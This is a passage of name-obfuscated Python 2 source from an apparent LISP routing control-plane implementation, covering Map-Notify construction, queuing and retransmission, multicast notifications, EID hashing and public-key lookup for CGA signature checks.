if 91 - 91: O0 - oO0o * O0
Oo000O000 = Ii1ii1 . nonce_key
if ( lisp_map_notify_queue . has_key ( Oo000O000 ) ) :
oOoO0O0O0O0 = lisp_map_notify_queue [ Oo000O000 ]
oOoO0O0O0O0 . retransmit_timer . cancel ( )
del ( oOoO0O0O0O0 )
if 84 - 84: IiII . OoO0O00
lisp_map_notify_queue [ Oo000O000 ] = Ii1ii1
if 73 - 73: OoOoOO00
if 47 - 47: oO0o
if 17 - 17: IiII
if 47 - 47: I11i . I1IiiI % ooOoO0o . i11iIiiIii
lprint ( "Send merged Map-Notify to ETR {}" . format ( red ( oo0OoO . print_address ( ) , False ) ) )
if 63 - 63: I1ii11iIi11i % I11i % OoooooooOO
lisp_send ( lisp_sockets , oo0OoO , LISP_CTRL_PORT , IiiiIi1iiii11 )
if 100 - 100: O0
parent . site . map_notifies_sent += 1
if 9 - 9: Ii1I
if 87 - 87: I1IiiI
if 56 - 56: OOooOOo % oO0o - OoOoOO00
if 27 - 27: I1ii11iIi11i - IiII * OoooooooOO * I1ii11iIi11i + i11iIiiIii . IiII
Ii1ii1 . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ Ii1ii1 ] )
Ii1ii1 . retransmit_timer . start ( )
if 81 - 81: oO0o / iIii1I11I1II1
return
if 15 - 15: Ii1I + I1IiiI . OOooOOo / OoooooooOO + I11i - I11i
if 27 - 27: Ii1I / o0oOOo0O0Ooo . iIii1I11I1II1 . I1IiiI - OoO0O00
if 28 - 28: ooOoO0o
if 88 - 88: oO0o
if 77 - 77: ooOoO0o + I1Ii111 . OoOoOO00
if 2 - 2: i1IIi - IiII + iIii1I11I1II1 % i1IIi * II111iiii
if 26 - 26: I11i
def lisp_build_map_notify ( lisp_sockets , eid_records , eid_list , record_count ,
source , port , nonce , key_id , alg_id , auth_len , site , map_register_ack ) :
if 57 - 57: I1ii11iIi11i + I1Ii111 + i11iIiiIii . i1IIi / i11iIiiIii
Oo000O000 = lisp_hex_string ( nonce ) + source . print_address ( )
if 43 - 43: Ii1I % I11i
if 5 - 5: OoooooooOO % i11iIiiIii * o0oOOo0O0Ooo * OoooooooOO - o0oOOo0O0Ooo % I11i
if 58 - 58: i11iIiiIii % Ii1I + Oo0Ooo - OoOoOO00 - i11iIiiIii / O0
if 36 - 36: OOooOOo
if 42 - 42: OOooOOo * ooOoO0o * i11iIiiIii + OoooooooOO . iIii1I11I1II1
if 95 - 95: i1IIi * O0 / II111iiii * OoOoOO00 * I1IiiI
lisp_remove_eid_from_map_notify_queue ( eid_list )
if ( lisp_map_notify_queue . has_key ( Oo000O000 ) ) :
Ii1ii1 = lisp_map_notify_queue [ Oo000O000 ]
IiII1iiI = red ( source . print_address_no_iid ( ) , False )
lprint ( "Map-Notify with nonce 0x{} pending for xTR {}" . format ( lisp_hex_string ( Ii1ii1 . nonce ) , IiII1iiI ) )
if 38 - 38: OOooOOo - OoOoOO00 / OoO0O00 / o0oOOo0O0Ooo - i11iIiiIii
return
if 4 - 4: I1IiiI * o0oOOo0O0Ooo - I11i - OoooooooOO . OoooooooOO
if 79 - 79: oO0o - iII111i
Ii1ii1 = lisp_map_notify ( lisp_sockets )
Ii1ii1 . record_count = record_count
key_id = key_id
Ii1ii1 . key_id = key_id
Ii1ii1 . alg_id = alg_id
Ii1ii1 . auth_len = auth_len
Ii1ii1 . nonce = nonce
Ii1ii1 . nonce_key = lisp_hex_string ( nonce )
Ii1ii1 . etr . copy_address ( source )
Ii1ii1 . etr_port = port
Ii1ii1 . site = site
Ii1ii1 . eid_list = eid_list
if 34 - 34: OoooooooOO + Ii1I - iII111i + OoooooooOO / I1IiiI
if 39 - 39: o0oOOo0O0Ooo . i1IIi * OoO0O00 / II111iiii / I1ii11iIi11i * OOooOOo
if 39 - 39: O0 . OOooOOo
if 95 - 95: I11i
if ( map_register_ack == False ) :
Oo000O000 = Ii1ii1 . nonce_key
lisp_map_notify_queue [ Oo000O000 ] = Ii1ii1
if 58 - 58: I1ii11iIi11i / i11iIiiIii + iII111i + I11i / oO0o
if 8 - 8: I1ii11iIi11i
if ( map_register_ack ) :
lprint ( "Send Map-Notify to ack Map-Register" )
else :
lprint ( "Send Map-Notify for RLOC-set change" )
if 100 - 100: OoooooooOO / I11i - Ii1I
if 11 - 11: OoO0O00
if 20 - 20: Oo0Ooo
if 34 - 34: I1Ii111 % i11iIiiIii / oO0o - i1IIi . o0oOOo0O0Ooo / oO0o
if 68 - 68: I1Ii111 % Ii1I * Oo0Ooo - O0 . IiII
IiiiIi1iiii11 = Ii1ii1 . encode ( eid_records , site . auth_key [ key_id ] )
Ii1ii1 . print_notify ( )
if 1 - 1: I1ii11iIi11i
if ( map_register_ack == False ) :
i111iII = lisp_eid_record ( )
i111iII . decode ( eid_records )
i111iII . print_record ( " " , False )
if 18 - 18: i11iIiiIii % OoO0O00 % OOooOOo . OOooOOo * Ii1I / II111iiii
if 81 - 81: iII111i % IiII / I11i
if 50 - 50: IiII + i1IIi % I1Ii111
if 72 - 72: I1Ii111
if 6 - 6: II111iiii - i1IIi
lisp_send_map_notify ( lisp_sockets , IiiiIi1iiii11 , Ii1ii1 . etr , port )
site . map_notifies_sent += 1
if 78 - 78: OoOoOO00 - Oo0Ooo * II111iiii % iIii1I11I1II1 . i11iIiiIii % iII111i
if ( map_register_ack ) : return
if 85 - 85: I1ii11iIi11i + OOooOOo % i1IIi
if 13 - 13: OOooOOo + i11iIiiIii / OOooOOo . O0 . OoO0O00 - Ii1I
if 31 - 31: OoOoOO00 * o0oOOo0O0Ooo / O0 . iII111i / i11iIiiIii
if 22 - 22: I1IiiI . OoooooooOO * I1ii11iIi11i + i11iIiiIii - O0 + i11iIiiIii
if 98 - 98: OOooOOo + I1IiiI / IiII / OoooooooOO / OOooOOo
if 8 - 8: OoooooooOO * OOooOOo * iII111i - iII111i
Ii1ii1 . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ Ii1ii1 ] )
Ii1ii1 . retransmit_timer . start ( )
return
if 32 - 32: I1Ii111
if 28 - 28: I11i . i11iIiiIii % iIii1I11I1II1 + OoOoOO00
if 4 - 4: OOooOOo + I1ii11iIi11i - iII111i + OOooOOo / IiII
if 23 - 23: iIii1I11I1II1 + OoooooooOO + ooOoO0o . iII111i . Oo0Ooo - iIii1I11I1II1
if 25 - 25: O0 + I1IiiI % OOooOOo / Oo0Ooo . IiII / I1Ii111
if 84 - 84: ooOoO0o . O0 + I1IiiI * OoO0O00 - I1IiiI
if 24 - 24: Ii1I
if 23 - 23: Oo0Ooo * i1IIi / I1IiiI . I11i - I1ii11iIi11i . iIii1I11I1II1
def lisp_send_map_notify_ack ( lisp_sockets , eid_records , map_notify , ms ) :
map_notify . map_notify_ack = True
if 15 - 15: O0 + o0oOOo0O0Ooo / oO0o
if 27 - 27: Ii1I * II111iiii / oO0o
if 99 - 99: I11i + ooOoO0o % I11i + O0 - Ii1I - I1Ii111
if 3 - 3: Oo0Ooo . I1IiiI
IiiiIi1iiii11 = map_notify . encode ( eid_records , ms . password )
map_notify . print_notify ( )
if 61 - 61: OoO0O00 - I1ii11iIi11i . Ii1I * i11iIiiIii
if 97 - 97: ooOoO0o
if 58 - 58: iII111i
if 47 - 47: II111iiii % Oo0Ooo . iIii1I11I1II1 . oO0o
oo0OoO = ms . map_server
lprint ( "Send Map-Notify-Ack to {}" . format (
red ( oo0OoO . print_address ( ) , False ) ) )
lisp_send ( lisp_sockets , oo0OoO , LISP_CTRL_PORT , IiiiIi1iiii11 )
return
if 52 - 52: I11i * I1IiiI % I11i - iII111i - Ii1I - OoooooooOO
if 15 - 15: iII111i
if 95 - 95: i11iIiiIii . Ii1I / II111iiii + II111iiii + Ii1I / I11i
if 72 - 72: I1Ii111 . I1Ii111 * O0 + I1ii11iIi11i / Oo0Ooo
if 96 - 96: oO0o . ooOoO0o * Oo0Ooo % ooOoO0o + I1Ii111 + iIii1I11I1II1
if 45 - 45: II111iiii
if 42 - 42: ooOoO0o
if 62 - 62: II111iiii * o0oOOo0O0Ooo . OoO0O00 / II111iiii
def lisp_send_multicast_map_notify ( lisp_sockets , site_eid , eid_list , xtr ) :
if 5 - 5: OoO0O00 + O0 . OoooooooOO + I1IiiI + i1IIi * OOooOOo
Ii1ii1 = lisp_map_notify ( lisp_sockets )
Ii1ii1 . record_count = 1
Ii1ii1 . nonce = lisp_get_control_nonce ( )
Ii1ii1 . nonce_key = lisp_hex_string ( Ii1ii1 . nonce )
Ii1ii1 . etr . copy_address ( xtr )
Ii1ii1 . etr_port = LISP_CTRL_PORT
Ii1ii1 . eid_list = eid_list
Oo000O000 = Ii1ii1 . nonce_key
if 19 - 19: OoooooooOO + i11iIiiIii / II111iiii - Oo0Ooo . OOooOOo
if 10 - 10: oO0o * Oo0Ooo
if 55 - 55: OoO0O00 - i1IIi - I11i * oO0o
if 91 - 91: I1Ii111
if 77 - 77: I1ii11iIi11i . ooOoO0o - iIii1I11I1II1 + Ii1I % II111iiii * II111iiii
if 41 - 41: II111iiii + Oo0Ooo - IiII / I1Ii111 - OOooOOo . oO0o
lisp_remove_eid_from_map_notify_queue ( Ii1ii1 . eid_list )
if ( lisp_map_notify_queue . has_key ( Oo000O000 ) ) :
Ii1ii1 = lisp_map_notify_queue [ Oo000O000 ]
lprint ( "Map-Notify with nonce 0x{} pending for ITR {}" . format ( Ii1ii1 . nonce , red ( xtr . print_address_no_iid ( ) , False ) ) )
if 100 - 100: ooOoO0o / I1ii11iIi11i * OoOoOO00 . I1ii11iIi11i . o0oOOo0O0Ooo * iIii1I11I1II1
return
if 15 - 15: iII111i + o0oOOo0O0Ooo / IiII
if 33 - 33: OoooooooOO . IiII * o0oOOo0O0Ooo
if 41 - 41: Ii1I . iII111i . o0oOOo0O0Ooo % OoooooooOO % IiII
if 81 - 81: IiII * i11iIiiIii + i1IIi + OOooOOo . i1IIi
if 6 - 6: i11iIiiIii - oO0o % OoO0O00 + iIii1I11I1II1
lisp_map_notify_queue [ Oo000O000 ] = Ii1ii1
if 69 - 69: IiII
if 13 - 13: i11iIiiIii
if 49 - 49: OoOoOO00
if 61 - 61: I1Ii111 / I1Ii111 / iII111i / ooOoO0o - I1IiiI . o0oOOo0O0Ooo
ooo0O0OO = site_eid . rtrs_in_rloc_set ( )
if ( ooo0O0OO ) :
if ( site_eid . is_rtr_in_rloc_set ( xtr ) ) : ooo0O0OO = False
if 61 - 61: OoooooooOO + I11i + I11i / i1IIi
if 97 - 97: i11iIiiIii + oO0o % OOooOOo . OoO0O00 . OOooOOo % ooOoO0o
if 93 - 93: I1IiiI % i11iIiiIii
if 45 - 45: OoooooooOO * o0oOOo0O0Ooo - OOooOOo + O0
if 64 - 64: iII111i * I1ii11iIi11i - OoOoOO00
i111iII = lisp_eid_record ( )
i111iII . record_ttl = 1440
i111iII . eid . copy_address ( site_eid . eid )
i111iII . group . copy_address ( site_eid . group )
i111iII . rloc_count = 0
for i1III111 in site_eid . registered_rlocs :
if ( ooo0O0OO ^ i1III111 . is_rtr ( ) ) : continue
i111iII . rloc_count += 1
if 1 - 1: i1IIi / OoO0O00 % i1IIi % i11iIiiIii / i1IIi
IiiiIi1iiii11 = i111iII . encode ( )
if 8 - 8: O0 / OOooOOo + iII111i % iIii1I11I1II1 % iIii1I11I1II1 . ooOoO0o
if 47 - 47: OoO0O00 / o0oOOo0O0Ooo / Ii1I * I1IiiI % ooOoO0o / I1Ii111
if 80 - 80: I1Ii111 / O0 * O0
if 40 - 40: OoO0O00 - oO0o / o0oOOo0O0Ooo . oO0o
Ii1ii1 . print_notify ( )
i111iII . print_record ( " " , False )
if 89 - 89: i11iIiiIii - II111iiii
if 67 - 67: IiII % I1Ii111 + i11iIiiIii
if 53 - 53: OOooOOo
if 95 - 95: oO0o - OOooOOo % I1Ii111 / OoooooooOO % OoooooooOO - O0
for i1III111 in site_eid . registered_rlocs :
if ( ooo0O0OO ^ i1III111 . is_rtr ( ) ) : continue
I1Ii11iI = lisp_rloc_record ( )
I1Ii11iI . store_rloc_entry ( i1III111 )
IiiiIi1iiii11 += I1Ii11iI . encode ( )
I1Ii11iI . print_record ( " " )
if 21 - 21: I1Ii111 . i1IIi - iII111i % I1ii11iIi11i . OOooOOo
if 52 - 52: Ii1I * I1ii11iIi11i
if 21 - 21: I1IiiI . i11iIiiIii - o0oOOo0O0Ooo * II111iiii % iIii1I11I1II1
if 9 - 9: I1ii11iIi11i + I11i
if 20 - 20: iII111i + i1IIi / oO0o % OoooooooOO * OoOoOO00
IiiiIi1iiii11 = Ii1ii1 . encode ( IiiiIi1iiii11 , "" )
if ( IiiiIi1iiii11 == None ) : return
if 70 - 70: Oo0Ooo - OOooOOo * OOooOOo / o0oOOo0O0Ooo
if 4 - 4: OoOoOO00 / OoO0O00
if 66 - 66: I1Ii111 / OoOoOO00
if 53 - 53: OoOoOO00 . i11iIiiIii - OoooooooOO
lisp_send_map_notify ( lisp_sockets , IiiiIi1iiii11 , xtr , LISP_CTRL_PORT )
if 92 - 92: O0 - i11iIiiIii + OoO0O00 - OoooooooOO - o0oOOo0O0Ooo
if 25 - 25: oO0o / oO0o / Ii1I / O0
if 56 - 56: ooOoO0o
if 19 - 19: O0 * I1IiiI + I1ii11iIi11i
Ii1ii1 . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ Ii1ii1 ] )
Ii1ii1 . retransmit_timer . start ( )
return
if 25 - 25: I11i - ooOoO0o / OoO0O00 / iII111i - OoO0O00
if 86 - 86: OoO0O00
if 89 - 89: OoooooooOO % iII111i * I1ii11iIi11i + I1ii11iIi11i . Oo0Ooo
if 4 - 4: I11i
if 8 - 8: IiII
if 1 - 1: ooOoO0o . IiII
if 4 - 4: iIii1I11I1II1 % I1IiiI - OoooooooOO / iII111i
def lisp_queue_multicast_map_notify ( lisp_sockets , rle_list ) :
Oo00oO0 = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 3 - 3: oO0o % I1IiiI - O0
for oOOooo000OoO in rle_list :
IiIIiIII1I1i = lisp_site_eid_lookup ( oOOooo000OoO [ 0 ] , oOOooo000OoO [ 1 ] , True )
if ( IiIIiIII1I1i == None ) : continue
if 25 - 25: OoO0O00 % IiII . i1IIi / OoOoOO00 + OoOoOO00
if 53 - 53: II111iiii % i1IIi + ooOoO0o . I1Ii111
if 52 - 52: I1IiiI + I1Ii111 * oO0o / i11iIiiIii * iIii1I11I1II1
if 27 - 27: Oo0Ooo
if 85 - 85: iIii1I11I1II1 . o0oOOo0O0Ooo + oO0o
if 79 - 79: O0 - iIii1I11I1II1 + i1IIi . I11i
if 21 - 21: II111iiii
I1iiiII1Ii1i1 = IiIIiIII1I1i . registered_rlocs
if ( len ( I1iiiII1Ii1i1 ) == 0 ) :
iII1iI1IIiii = { }
for iIiIi1I in IiIIiIII1I1i . individual_registrations . values ( ) :
for i1III111 in iIiIi1I . registered_rlocs :
if ( i1III111 . is_rtr ( ) == False ) : continue
iII1iI1IIiii [ i1III111 . rloc . print_address ( ) ] = i1III111
if 45 - 45: o0oOOo0O0Ooo + iIii1I11I1II1 / O0
if 2 - 2: I11i + I1IiiI . IiII . OoOoOO00 * oO0o - ooOoO0o
I1iiiII1Ii1i1 = iII1iI1IIiii . values ( )
if 29 - 29: OoO0O00
if 78 - 78: iII111i * ooOoO0o + O0 % ooOoO0o + OoO0O00
if 41 - 41: II111iiii . oO0o + O0 % i1IIi . Ii1I
if 90 - 90: ooOoO0o * I1IiiI / II111iiii % Oo0Ooo % OoooooooOO
if 78 - 78: OoooooooOO . IiII
if 55 - 55: I11i / I1ii11iIi11i * O0 + IiII % I11i
OOooOo00Ooo = [ ]
o00O0o0O0O0o = False
if ( IiIIiIII1I1i . eid . address == 0 and IiIIiIII1I1i . eid . mask_len == 0 ) :
o0ooOO0OOO00O0 = [ ]
II11Ii1i1iiII = [ ]
if ( len ( I1iiiII1Ii1i1 ) != 0 and I1iiiII1Ii1i1 [ 0 ] . rle != None ) :
II11Ii1i1iiII = I1iiiII1Ii1i1 [ 0 ] . rle . rle_nodes
if 38 - 38: I1ii11iIi11i + i1IIi % iIii1I11I1II1
for Iii in II11Ii1i1iiII :
OOooOo00Ooo . append ( Iii . address )
o0ooOO0OOO00O0 . append ( Iii . address . print_address_no_iid ( ) )
if 96 - 96: OoOoOO00 - OoOoOO00
lprint ( "Notify existing RLE-nodes {}" . format ( o0ooOO0OOO00O0 ) )
else :
if 59 - 59: OoOoOO00 / iII111i * i11iIiiIii
if 61 - 61: I1Ii111 % oO0o - OOooOOo
if 91 - 91: o0oOOo0O0Ooo * Oo0Ooo
if 59 - 59: iIii1I11I1II1 / Oo0Ooo % II111iiii
if 55 - 55: ooOoO0o - IiII + o0oOOo0O0Ooo
for i1III111 in I1iiiII1Ii1i1 :
if ( i1III111 . is_rtr ( ) ) : OOooOo00Ooo . append ( i1III111 . rloc )
if 48 - 48: O0 - iIii1I11I1II1 * OOooOOo
if 33 - 33: I11i
if 63 - 63: Ii1I % II111iiii / OoOoOO00 + Oo0Ooo
if 28 - 28: OoO0O00 + I1IiiI . oO0o + II111iiii - O0
if 32 - 32: oO0o
o00O0o0O0O0o = ( len ( OOooOo00Ooo ) != 0 )
if ( o00O0o0O0O0o == False ) :
o0o000 = lisp_site_eid_lookup ( oOOooo000OoO [ 0 ] , Oo00oO0 , False )
if ( o0o000 == None ) : continue
if 62 - 62: i11iIiiIii + OoooooooOO + IiII - OoO0O00 / oO0o * iIii1I11I1II1
for i1III111 in o0o000 . registered_rlocs :
if ( i1III111 . rloc . is_null ( ) ) : continue
OOooOo00Ooo . append ( i1III111 . rloc )
if 91 - 91: o0oOOo0O0Ooo - i11iIiiIii + Oo0Ooo % iIii1I11I1II1
if 58 - 58: iII111i / ooOoO0o - I1Ii111 + I1Ii111 * ooOoO0o
if 48 - 48: iII111i % O0 % Ii1I * OoO0O00 . OoO0O00
if 74 - 74: OoO0O00 * i1IIi + I1ii11iIi11i / o0oOOo0O0Ooo / i1IIi
if 94 - 94: Ii1I
if 13 - 13: OoO0O00 - II111iiii . iII111i + OoOoOO00 / i11iIiiIii
if ( len ( OOooOo00Ooo ) == 0 ) :
lprint ( "No ITRs or RTRs found for {}, Map-Notify suppressed" . format ( green ( IiIIiIII1I1i . print_eid_tuple ( ) , False ) ) )
if 32 - 32: ooOoO0o / II111iiii / I1ii11iIi11i
continue
if 34 - 34: iIii1I11I1II1
if 47 - 47: OOooOOo * iII111i
if 71 - 71: IiII - OoooooooOO * i11iIiiIii . OoooooooOO % i1IIi . Oo0Ooo
if 3 - 3: OoO0O00 + i11iIiiIii + oO0o * IiII
if 19 - 19: iII111i / II111iiii . I1Ii111 * I1IiiI - OOooOOo
if 70 - 70: OoO0O00
for iI11IiI1 in OOooOo00Ooo :
lprint ( "Build Map-Notify to {}TR {} for {}" . format ( "R" if o00O0o0O0O0o else "x" , red ( iI11IiI1 . print_address_no_iid ( ) , False ) ,
# OOooOOo * OoO0O00 / I1Ii111
green ( IiIIiIII1I1i . print_eid_tuple ( ) , False ) ) )
if 96 - 96: iII111i * iII111i / iII111i + I1IiiI
i1I1iO0000oOooOoO0 = [ IiIIiIII1I1i . print_eid_tuple ( ) ]
lisp_send_multicast_map_notify ( lisp_sockets , IiIIiIII1I1i , i1I1iO0000oOooOoO0 , iI11IiI1 )
time . sleep ( .001 )
if 49 - 49: OoO0O00 / iII111i
if 22 - 22: I11i + II111iiii * iIii1I11I1II1 % OOooOOo
return
if 7 - 7: I11i - OOooOOo + I1IiiI + IiII . I1Ii111
if 76 - 76: o0oOOo0O0Ooo % IiII - iII111i % ooOoO0o
if 34 - 34: OoooooooOO / ooOoO0o - iII111i + IiII - iII111i
if 65 - 65: O0 * Ii1I % ooOoO0o
if 29 - 29: iII111i % Ii1I / OoOoOO00 % O0 / IiII
if 32 - 32: IiII * II111iiii . Ii1I
if 68 - 68: I11i / O0
if 6 - 6: oO0o - oO0o . I1IiiI % I1ii11iIi11i
def lisp_find_sig_in_rloc_set ( packet , rloc_count ) :
for IiIIi1IiiIiI in range ( rloc_count ) :
I1Ii11iI = lisp_rloc_record ( )
packet = I1Ii11iI . decode ( packet , None )
i1iii = I1Ii11iI . json
if ( i1iii == None ) : continue
if 31 - 31: II111iiii - Ii1I * OOooOOo - i11iIiiIii / OoooooooOO - I1Ii111
try :
i1iii = json . loads ( i1iii . json_string )
except :
lprint ( "Found corrupted JSON signature" )
continue
if 76 - 76: Oo0Ooo
if 93 - 93: i1IIi - I1IiiI * i11iIiiIii / Ii1I . Ii1I - i1IIi
if ( i1iii . has_key ( "signature" ) == False ) : continue
return ( I1Ii11iI )
if 19 - 19: iIii1I11I1II1 * OOooOOo * Oo0Ooo % I1IiiI
return ( None )
if 93 - 93: IiII % OoOoOO00 / I1IiiI + o0oOOo0O0Ooo * ooOoO0o / i1IIi
if 25 - 25: O0 / Oo0Ooo - o0oOOo0O0Ooo * Oo0Ooo
if 45 - 45: Ii1I * IiII - OOooOOo
if 57 - 57: iII111i % OoO0O00 / OoooooooOO
if 69 - 69: oO0o
if 44 - 44: IiII - II111iiii % Ii1I
if 64 - 64: Ii1I % OoO0O00 + OOooOOo % OoOoOO00 + IiII
if 92 - 92: iII111i * Oo0Ooo - OoOoOO00
if 33 - 33: i11iIiiIii - OoOoOO00 . OOooOOo * II111iiii . Ii1I
if 59 - 59: OoOoOO00
if 29 - 29: iII111i - II111iiii * OoooooooOO * OoooooooOO
if 15 - 15: IiII / OOooOOo / iIii1I11I1II1 / OoOoOO00
if 91 - 91: i11iIiiIii % O0 . Oo0Ooo / I1Ii111
if 62 - 62: Oo0Ooo . II111iiii % OoO0O00 . Ii1I * OOooOOo + II111iiii
if 7 - 7: OOooOOo
if 22 - 22: Oo0Ooo + ooOoO0o
if 71 - 71: OOooOOo . Ii1I * i11iIiiIii . I11i
if 9 - 9: O0 / I1ii11iIi11i . iII111i . O0 + IiII % I11i
if 27 - 27: i11iIiiIii - I1ii11iIi11i / O0 - i1IIi + I1IiiI * iII111i
def lisp_get_eid_hash ( eid ) :
iI1iIIIIiiii = None
for IiI1Iiii in lisp_eid_hashes :
if 7 - 7: OoOoOO00 + OoO0O00 * I1IiiI
if 63 - 63: I1ii11iIi11i + iII111i * i1IIi
if 63 - 63: I1ii11iIi11i / II111iiii % oO0o + ooOoO0o . Ii1I % I11i
if 59 - 59: I1Ii111 % o0oOOo0O0Ooo - I1IiiI * i1IIi
o0OoO0000o = IiI1Iiii . instance_id
if ( o0OoO0000o == - 1 ) : IiI1Iiii . instance_id = eid . instance_id
if 5 - 5: I1IiiI
ii1iOo = eid . is_more_specific ( IiI1Iiii )
IiI1Iiii . instance_id = o0OoO0000o
if ( ii1iOo ) :
iI1iIIIIiiii = 128 - IiI1Iiii . mask_len
break
if 96 - 96: OoO0O00 + I11i / oO0o
if 81 - 81: OoO0O00 . I1IiiI - IiII . ooOoO0o . i1IIi
if ( iI1iIIIIiiii == None ) : return ( None )
if 20 - 20: O0 - OoooooooOO % i1IIi + i11iIiiIii / Ii1I
ii1i1II11II1i = eid . address
II111i1II1i1I = ""
for IiIIi1IiiIiI in range ( 0 , iI1iIIIIiiii / 16 ) :
IiiIIi1 = ii1i1II11II1i & 0xffff
IiiIIi1 = hex ( IiiIIi1 ) [ 2 : - 1 ]
II111i1II1i1I = IiiIIi1 . zfill ( 4 ) + ":" + II111i1II1i1I
ii1i1II11II1i >>= 16
if 31 - 31: Oo0Ooo / iII111i / OoOoOO00 + iIii1I11I1II1 . iIii1I11I1II1
if ( iI1iIIIIiiii % 16 != 0 ) :
IiiIIi1 = ii1i1II11II1i & 0xff
IiiIIi1 = hex ( IiiIIi1 ) [ 2 : - 1 ]
II111i1II1i1I = IiiIIi1 . zfill ( 2 ) + ":" + II111i1II1i1I
if 41 - 41: I1ii11iIi11i
return ( II111i1II1i1I [ 0 : - 1 ] )
if 90 - 90: IiII * I1Ii111 * I1Ii111 * I1IiiI . OoOoOO00 * iII111i
if 46 - 46: OoOoOO00
if 1 - 1: oO0o + ooOoO0o / iII111i
if 11 - 11: IiII / OoO0O00 * I1ii11iIi11i
if 20 - 20: I1IiiI * OoO0O00 / Oo0Ooo
if 59 - 59: I11i % i1IIi % Oo0Ooo % Oo0Ooo
if 91 - 91: I11i
if 98 - 98: I11i - II111iiii . IiII % Oo0Ooo
if 65 - 65: OoO0O00
if 65 - 65: oO0o
if 77 - 77: I11i * i1IIi - OOooOOo / OoOoOO00
def lisp_lookup_public_key ( eid ) :
o0OoO0000o = eid . instance_id
if 50 - 50: O0 - oO0o . oO0o
if 98 - 98: IiII % Ii1I / Ii1I
if 10 - 10: Ii1I
if 69 - 69: I1Ii111 * OoooooooOO . o0oOOo0O0Ooo % I1IiiI
if 70 - 70: iII111i . i11iIiiIii * I1Ii111
oOoIiIi = lisp_get_eid_hash ( eid )
if ( oOoIiIi == None ) : return ( [ None , None , False ] )
if 100 - 100: oO0o + I1Ii111 % iIii1I11I1II1 / I1Ii111
oOoIiIi = "hash-" + oOoIiIi
ii1iIIi = lisp_address ( LISP_AFI_NAME , oOoIiIi , len ( oOoIiIi ) , o0OoO0000o )
IIi1iiIII11 = lisp_address ( LISP_AFI_NONE , "" , 0 , o0OoO0000o )
if 27 - 27: iIii1I11I1II1 + OoOoOO00 % i11iIiiIii / OoOoOO00 + iIii1I11I1II1
if 65 - 65: o0oOOo0O0Ooo
if 73 - 73: I11i . I1ii11iIi11i - OoO0O00 + OoooooooOO
if 71 - 71: I1IiiI
o0o000 = lisp_site_eid_lookup ( ii1iIIi , IIi1iiIII11 , True )
if ( o0o000 == None ) : return ( [ ii1iIIi , None , False ] )
if 27 - 27: OoO0O00 + i1IIi * OoooooooOO * iIii1I11I1II1 - Ii1I
if 85 - 85: OoO0O00 + II111iiii / OoO0O00 . II111iiii * OoOoOO00 * I1IiiI
if 19 - 19: iII111i / Ii1I + iIii1I11I1II1 * O0 - Oo0Ooo
if 47 - 47: iIii1I11I1II1 % I1ii11iIi11i
I1i1ii = None
for I1IIiIIIii in o0o000 . registered_rlocs :
II = I1IIiIIIii . json
if ( II == None ) : continue
try :
II = json . loads ( II . json_string )
except :
lprint ( "Registered RLOC JSON format is invalid for {}" . format ( oOoIiIi ) )
if 33 - 33: IiII + I1IiiI / i11iIiiIii - OoO0O00
return ( [ ii1iIIi , None , False ] )
if 32 - 32: i1IIi / iIii1I11I1II1 - OoOoOO00
if ( II . has_key ( "public-key" ) == False ) : continue
I1i1ii = II [ "public-key" ]
break
if 5 - 5: Oo0Ooo / OoooooooOO / Ii1I * I1Ii111
return ( [ ii1iIIi , I1i1ii , True ] )
if 37 - 37: Ii1I * o0oOOo0O0Ooo
if 39 - 39: OoooooooOO
if 37 - 37: OoO0O00 . iII111i
if 32 - 32: II111iiii
if 11 - 11: i11iIiiIii - OOooOOo . i1IIi + OOooOOo - O0
if 17 - 17: i1IIi % o0oOOo0O0Ooo % ooOoO0o / I11i
if 68 - 68: OoOoOO00
if 14 - 14: iIii1I11I1II1 + oO0o / ooOoO0o
def lisp_verify_cga_sig ( eid , rloc_record ) :
if 20 - 20: I1ii11iIi11i . II111iiii % I1Ii111 + I1Ii111 / OoooooooOO . Ii1I
if 98 - 98: OoooooooOO - i11iIiiIii - iII111i + Ii1I - I1IiiI
if 75 - 75: OOooOOo
if 25 - 25: iII111i / I1ii11iIi11i - ooOoO0o
if 53 - 53: IiII / OoooooooOO / ooOoO0o + Oo0Ooo - OOooOOo - iIii1I11I1II1
O0OO0OoO00oOo = json . loads ( rloc_record . json . json_string )
if 53 - 53: OOooOOo . I1IiiI . o0oOOo0O0Ooo / o0oOOo0O0Ooo
if ( lisp_get_eid_hash ( eid ) ) :
Oo0o0ooOo0 = eid
elif ( O0OO0OoO00oOo . has_key ( "signature-eid" ) ) :
Ii11i11 = O0OO0OoO00oOo [ "signature-eid" ]
Oo0o0ooOo0 = lisp_address ( LISP_AFI_IPV6 , Ii11i11 , 0 , 0 )
else :
lprint ( " No signature-eid found in RLOC-record" )
return ( False )
if 2 - 2: ooOoO0o
if 55 - 55: I11i + i1IIi * OoOoOO00 % Oo0Ooo * II111iiii . I1IiiI
if 98 - 98: I1ii11iIi11i
if 57 - 57: OOooOOo * I11i . oO0o
if 17 - 17: iII111i - OOooOOo * I1IiiI + i1IIi % I1ii11iIi11i
ii1iIIi , I1i1ii , o0OOOooO = lisp_lookup_public_key ( Oo0o0ooOo0 )
if ( ii1iIIi == None ) :
I11i11i1 = green ( Oo0o0ooOo0 . print_address ( ) , False )
lprint ( " Could not parse hash in EID {}" . format ( I11i11i1 ) )
return ( False )
if 6 - 6: Ii1I
if 23 - 23: o0oOOo0O0Ooo + I1IiiI
ooOoOO0o = "found" if o0OOOooO else bold ( "not found" , False )
I11i11i1 = green ( ii1iIIi . print_address ( ) , False )
lprint ( " Lookup for crypto-hashed EID {} {}" . format ( I11i11i1 , ooOoOO0o ) )
if ( o0OOOooO == False ) : return ( False )
if 60 - 60: I1ii11iIi11i * i11iIiiIii + oO0o
if ( I1i1ii == None ) :
lprint ( " RLOC-record with public-key not found" )
return ( False )
if 59 - 59: I11i
if 61 - 61: IiII * I1Ii111 * OoO0O00 / oO0o - OoooooooOO
iI11i11ii11 = I1i1ii [ 0 : 8 ] + "..." + I1i1ii [ - 8 : : ]
lprint ( " RLOC-record with public-key '{}' found" . format ( iI11i11ii11 ) )
if 48 - 48: II111iiii
if 79 - 79: II111iiii % II111iiii
if 85 - 85: OoooooooOO / o0oOOo0O0Ooo * I11i + iII111i
